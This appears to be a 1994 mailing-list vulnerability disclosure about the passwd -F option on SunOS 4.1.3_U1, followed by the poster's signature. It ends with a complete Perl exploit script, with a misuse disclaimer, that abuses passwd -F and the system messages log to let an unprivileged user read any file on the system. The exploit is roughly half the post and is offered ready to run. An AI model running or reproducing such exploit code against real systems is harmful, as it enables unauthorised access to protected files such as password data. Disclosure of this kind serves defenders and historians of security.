FYI, this vulnerability exists on 4.1.3_U1. I do not know how widespread knowledge of this vulnerability is, but I have seen Suns running a modified passwd program that has "-F option disabled" (according to the message output by passwd). So somebody out there has known about it for a while. The following trivial perl script allows non-privileged users to easily read any file on the system. --steve -- Steve Mitchell KD6BET TIP#168 steve_mitchell@csufresno.edu "STUFF: Anything that can be used for homebrewing." "JUNK: Everything else you thought could be used for homebrewing, but can't." --Steve Casselman #!/usr/local/bin/perl # # Author disclaims all responsibility for misuse of this script # --sjm 5/10/94 $file = shift || die "Usage: $0 filename\n"; open(A,"</var/adm/messages"); @statf = stat(A); system("/usr/bin/passwd -F $file 1>&2 2>/dev/null"); seek(A,$statf[7],0); while(<A>) { next if !/passwd/; ($stuff,$line) = split(/"/,$_,2); print $line; }